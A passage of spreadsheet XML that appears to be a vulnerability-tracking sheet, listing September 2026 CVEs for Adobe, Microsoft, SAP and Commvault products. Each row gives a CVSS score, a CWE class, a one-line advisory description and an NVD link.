t="inlineStr"><is><t>CVE-2026-75862</t></is></c><c r="D622" s="5" t="n"><v>7.8</v></c><c r="E622" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F622" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G622" s="5" t="inlineStr" /><c r="H622" s="5" t="n"><v>0.002</v></c><c r="I622" s="5" t="inlineStr" /><c r="J622" s="5" t="inlineStr" /><c r="K622" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L622" s="5" t="inlineStr" /><c r="M622" s="5" t="inlineStr" /><c r="N622" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O622" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P622" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q622" s="5" t="inlineStr" /><c r="R622" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S622"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22" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75862</t></is></c></row><row r="623"><c r="A623" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B623" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C623" s="5" t="inlineStr"><is><t>CVE-2026-75863</t></is></c><c r="D623" s="5" t="n"><v>7.8</v></c><c r="E623" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F623" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G623" s="5" t="inlineStr" /><c r="H623" s="5" t="n"><v>0.002</v></c><c r="I623" s="5" t="inlineStr" /><c r="J623" s="5" t="inlineStr" /><c r="K623" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L623" s="5" t="inlineStr" /><c r="M623" s="5" t="inlineStr" /><c r="N623" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O623" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P623" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q623" s="5" t="inlineStr" /><c r="R623" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S623"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23" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75863</t></is></c></row><row r="624"><c r="A624" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B624" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C624" s="5" t="inlineStr"><is><t>CVE-2026-75992</t></is></c><c r="D624" s="5" t="n"><v>7.8</v></c><c r="E624" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F624" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G624" s="5" t="inlineStr" /><c r="H624" s="5" t="n"><v>0.002</v></c><c r="I624" s="5" t="inlineStr" /><c r="J624" s="5" t="inlineStr" /><c r="K624" s="5" t="inlineStr" /><c r="L624" s="5" t="inlineStr" /><c r="M624" s="5" t="inlineStr" /><c r="N624" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O624" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P624" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q624" s="5" t="inlineStr" /><c r="R624" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S624" s="5" t="inlineStr"><is><t>Illustrator is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T624" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75992</t></is></c></row><row r="625"><c r="A625" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B625" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C625" s="5" t="inlineStr"><is><t>CVE-2026-76967</t></is></c><c r="D625" s="5" t="n"><v>7.8</v></c><c r="E625" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F625" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G625" s="5" t="inlineStr" /><c r="H625" s="5" t="n"><v>0.002</v></c><c r="I625" s="5" t="inlineStr" /><c r="J625" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K625" s="5" t="inlineStr" /><c r="L625" s="5" t="inlineStr" /><c r="M625" s="5" t="inlineStr" /><c r="N625" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O625" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P625" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q625" s="5" t="inlineStr" /><c r="R625" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S625" s="5" t="inlineStr"><is><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is></c><c r="T625" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76967</t></is></c></row><row r="626"><c r="A626" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B626" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C626" s="5" t="inlineStr"><is><t>CVE-2026-77091</t></is></c><c r="D626" s="5" t="n"><v>7.8</v></c><c r="E626" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F626" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G626" s="5" t="inlineStr" /><c r="H626" s="5" t="n"><v>0.001</v></c><c r="I626" s="5" t="inlineStr" /><c r="J626" s="5" t="inlineStr" /><c r="K626" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L626" s="5" t="inlineStr" /><c r="M626" s="5" t="inlineStr" /><c r="N626" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O626" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P626" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q626" s="5" t="inlineStr" /><c r="R626" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S626" s="5" t="inlineStr"><is><t>DataCube contained a path traversal issue affecting security feature enforcement. Software customers upgrade to resolved maintenance release. Update Content Extractor and Index Store.</t></is></c><c r="T626" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77091</t></is></c></row><row r="627"><c r="A627" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B627" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C627" s="5" t="inlineStr"><is><t>CVE-2026-77489</t></is></c><c r="D627" s="5" t="n"><v>7.8</v></c><c r="E627" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F627" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G627" s="5" t="inlineStr" /><c r="H627" s="5" t="n"><v>0.003</v></c><c r="I627" s="5" t="inlineStr" /><c r="J627" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K62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27" s="5" t="inlineStr" /><c r="M627" s="5" t="inlineStr" /><c r="N627" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O627" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P627" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q627" s="5" t="inlineStr" /><c r="R627" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S627" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T627" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77489</t></is></c></row><row r="628"><c r="A628" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B628" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C628" s="5" t="inlineStr"><is><t>CVE-2026-77500</t></is></c><c r="D628" s="5" t="n"><v>7.8</v></c><c r="E628" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F628" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G628" s="5" t="inlineStr" /><c r="H628" s="5" t="n"><v>0.003</v></c><c r="I628" s="5" t="inlineStr" /><c r="J628" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K62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28" s="5" t="inlineStr" /><c r="M628" s="5" t="inlineStr" /><c r="N628" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O628" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P628" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q628" s="5" t="inlineStr" /><c r="R628" s="5" t="inlineStr"><is><t>CWE-763</t></is></c><c r="S628" s="5" t="inlineStr"><is><t>Release of invalid pointer or reference in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T628" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77500</t></is></c></row><row r="629"><c r="A629" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B629" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C629" s="5" t="inlineStr"><is><t>CVE-2026-77503</t></is></c><c r="D629" s="5" t="n"><v>7.8</v></c><c r="E629" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F629" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G629" s="5" t="inlineStr" /><c r="H629" s="5" t="n"><v>0.002</v></c><c r="I629" s="5" t="inlineStr" /><c r="J629" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K62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29" s="5" t="inlineStr" /><c r="M629" s="5" t="inlineStr" /><c r="N629" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O629" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P629" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q629" s="5" t="inlineStr" /><c r="R629" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S629" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally.</t></is></c><c r="T629" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77503</t></is></c></row><row r="630"><c r="A630" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B630" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C630" s="5" t="inlineStr"><is><t>CVE-2026-77904</t></is></c><c r="D630" s="5" t="n"><v>7.8</v></c><c r="E630" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F630" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G630" s="5" t="inlineStr" /><c r="H630" s="5" t="n"><v>0.002</v></c><c r="I630" s="5" t="inlineStr" /><c r="J630" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K63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30" s="5" t="inlineStr" /><c r="M630" s="5" t="inlineStr" /><c r="N630" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O630" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P630" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q630" s="5" t="inlineStr" /><c r="R630" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S630" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T630" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77904</t></is></c></row><row r="631"><c r="A631" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B631" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C631" s="5" t="inlineStr"><is><t>CVE-2026-78447</t></is></c><c r="D631" s="5" t="n"><v>7.8</v></c><c r="E631" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F631" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G631" s="5" t="inlineStr" /><c r="H631" s="5" t="n"><v>0.002</v></c><c r="I631" s="5" t="inlineStr" /><c r="J631" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K63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31" s="5" t="inlineStr" /><c r="M631" s="5" t="inlineStr" /><c r="N631" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O631" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P631" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q631" s="5" t="inlineStr" /><c r="R631" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S631" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T631" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78447</t></is></c></row><row r="632"><c r="A632" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B632" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C632" s="5" t="inlineStr"><is><t>CVE-2026-78448</t></is></c><c r="D632" s="5" t="n"><v>7.8</v></c><c r="E632" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F632" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G632" s="5" t="inlineStr" /><c r="H632" s="5" t="n"><v>0.002</v></c><c r="I632" s="5" t="inlineStr" /><c r="J632" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K63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32" s="5" t="inlineStr" /><c r="M632" s="5" t="inlineStr" /><c r="N632" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O632" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P632" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q632" s="5" t="inlineStr" /><c r="R632" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S632" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T632" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78448</t></is></c></row><row r="633"><c r="A633" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B633" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C633" s="5" t="inlineStr"><is><t>CVE-2026-79907</t></is></c><c r="D633" s="5" t="n"><v>7.8</v></c><c r="E633" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F633" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G633" s="5" t="inlineStr" /><c r="H633" s="5" t="n"><v>0.002</v></c><c r="I633" s="5" t="inlineStr" /><c r="J633" s="5" t="inlineStr" /><c r="K633" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L633" s="5" t="inlineStr" /><c r="M633" s="5" t="inlineStr" /><c r="N633" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O633" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P633" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q633" s="5" t="inlineStr" /><c r="R633" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S633" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Double Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T633" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79907</t></is></c></row><row r="634"><c r="A634" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B634" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C634" s="5" t="inlineStr"><is><t>CVE-2026-79908</t></is></c><c r="D634" s="5" t="n"><v>7.8</v></c><c r="E634" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F634" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G634" s="5" t="inlineStr" /><c r="H634" s="5" t="n"><v>0.002</v></c><c r="I634" s="5" t="inlineStr" /><c r="J634" s="5" t="inlineStr" /><c r="K634" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L634" s="5" t="inlineStr" /><c r="M634" s="5" t="inlineStr" /><c r="N634" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O634" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P634" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q634" s="5" t="inlineStr" /><c r="R634" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S634" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T634" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79908</t></is></c></row><row r="635"><c r="A635" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B635" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C635" s="5" t="inlineStr"><is><t>CVE-2026-79909</t></is></c><c r="D635" s="5" t="n"><v>7.8</v></c><c r="E635" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F635" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G635" s="5" t="inlineStr" /><c r="H635" s="5" t="n"><v>0.002</v></c><c r="I635" s="5" t="inlineStr" /><c r="J635" s="5" t="inlineStr" /><c r="K635" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L635" s="5" t="inlineStr" /><c r="M635" s="5" t="inlineStr" /><c r="N635" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O635" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P635" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q635" s="5" t="inlineStr" /><c r="R635" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S635" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T635" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79909</t></is></c></row><row r="636"><c r="A636" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B636" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C636" s="5" t="inlineStr"><is><t>CVE-2026-80075</t></is></c><c r="D636" s="5" t="n"><v>7.8</v></c><c r="E636" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F636" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G636" s="5" t="inlineStr" /><c r="H636" s="5" t="n"><v>0.003</v></c><c r="I636" s="5" t="inlineStr" /><c r="J636" s="5" t="inlineStr" /><c r="K636" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L636" s="5" t="inlineStr" /><c r="M636" s="5" t="inlineStr" /><c r="N636" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O636" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P636" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q636" s="5" t="inlineStr" /><c r="R636" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S636" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Work Folders allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T636" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80075</t></is></c></row><row r="637"><c r="A637" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B637" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C637" s="5" t="inlineStr"><is><t>CVE-2026-80161</t></is></c><c r="D637" s="5" t="n"><v>7.8</v></c><c r="E637" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F637" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G637" s="5" t="inlineStr" /><c r="H637" s="5" t="n"><v>0.002</v></c><c r="I637" s="5" t="inlineStr" /><c r="J637" s="5" t="inlineStr" /><c r="K637" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L637" s="5" t="inlineStr" /><c r="M637" s="5" t="inlineStr" /><c r="N637" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O637" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P637" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q637" s="5" t="inlineStr" /><c r="R637" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S637" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Access of Resource Using Incompatible Type ('Type Confusion') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T637" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80161</t></is></c></row><row r="638"><c r="A638" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B638" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C638" s="5" t="inlineStr"><is><t>CVE-2026-81353</t></is></c><c r="D638" s="5" t="n"><v>7.8</v></c><c r="E638" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F638" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G638" s="5" t="inlineStr" /><c r="H638" s="5" t="n"><v>0.004</v></c><c r="I638" s="5" t="inlineStr" /><c r="J638" s="5" t="inlineStr" /><c r="K638" s="5" t="inlineStr"><is><t>microsoft:heif_image_extension</t></is></c><c r="L638" s="5" t="inlineStr" /><c r="M638" s="5" t="inlineStr" /><c r="N638" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O638" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P638" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q638" s="5" t="inlineStr" /><c r="R638" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S638" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t></is></c><c r="T638" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81353</t></is></c></row><row r="639"><c r="A639" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B639" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C639" s="5" t="inlineStr"><is><t>CVE-2026-81386</t></is></c><c r="D639" s="5" t="n"><v>7.8</v></c><c r="E639" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F639" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G639" s="5" t="inlineStr" /><c r="H639" s="5" t="n"><v>0.003</v></c><c r="I639" s="5" t="inlineStr" /><c r="J639" s="5" t="inlineStr" /><c r="K639" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L639" s="5" t="inlineStr" /><c r="M639" s="5" t="inlineStr" /><c r="N639" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O639" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P639" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q639" s="5" t="inlineStr" /><c r="R639" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S639" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T639" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81386</t></is></c></row><row r="640"><c r="A640" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B640" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C640" s="5" t="inlineStr"><is><t>CVE-2026-81388</t></is></c><c r="D640" s="5" t="n"><v>7.8</v></c><c r="E640" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F640" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G640" s="5" t="inlineStr" /><c r="H640" s="5" t="n"><v>0.004</v></c><c r="I640" s="5" t="inlineStr" /><c r="J640" s="5" t="inlineStr" /><c r="K640" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L640" s="5" t="inlineStr" /><c r="M640" s="5" t="inlineStr" /><c r="N640" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O640" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P640" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q640" s="5" t="inlineStr" /><c r="R640" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S640" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T640" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81388</t></is></c></row><row r="641"><c r="A641" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B641" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C641" s="5" t="inlineStr"><is><t>CVE-2026-81396</t></is></c><c r="D641" s="5" t="n"><v>7.8</v></c><c r="E641" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F641" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G641" s="5" t="inlineStr" /><c r="H641" s="5" t="n"><v>0.004</v></c><c r="I641" s="5" t="inlineStr" /><c r="J641" s="5" t="inlineStr" /><c r="K641" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L641" s="5" t="inlineStr" /><c r="M641" s="5" t="inlineStr" /><c r="N641" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O641" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P641" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q641" s="5" t="inlineStr" /><c r="R641" s="5" t="inlineStr"><is><t>CWE-121, CWE-193</t></is></c><c r="S641" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T641" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81396</t></is></c></row><row r="642"><c r="A642" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B642" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C642" s="5" t="inlineStr"><is><t>CVE-2026-81397</t></is></c><c r="D642" s="5" t="n"><v>7.8</v></c><c r="E642" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F642" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G642" s="5" t="inlineStr" /><c r="H642" s="5" t="n"><v>0.004</v></c><c r="I642" s="5" t="inlineStr" /><c r="J642" s="5" t="inlineStr" /><c r="K642" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L642" s="5" t="inlineStr" /><c r="M642" s="5" t="inlineStr" /><c r="N642" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O642" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P642" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q642" s="5" t="inlineStr" /><c r="R642" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S642" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T642" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81397</t></is></c></row><row r="643"><c r="A643" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B643" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C643" s="5" t="inlineStr"><is><t>CVE-2026-81398</t></is></c><c r="D643" s="5" t="n"><v>7.8</v></c><c r="E643" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F643" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G643" s="5" t="inlineStr" /><c r="H643" s="5" t="n"><v>0.003</v></c><c r="I643" s="5" t="inlineStr" /><c r="J643" s="5" t="inlineStr" /><c r="K643" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L643" s="5" t="inlineStr" /><c r="M643" s="5" t="inlineStr" /><c r="N643" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O643" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P643" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q643" s="5" t="inlineStr" /><c r="R643" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S643" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T643" s="6" 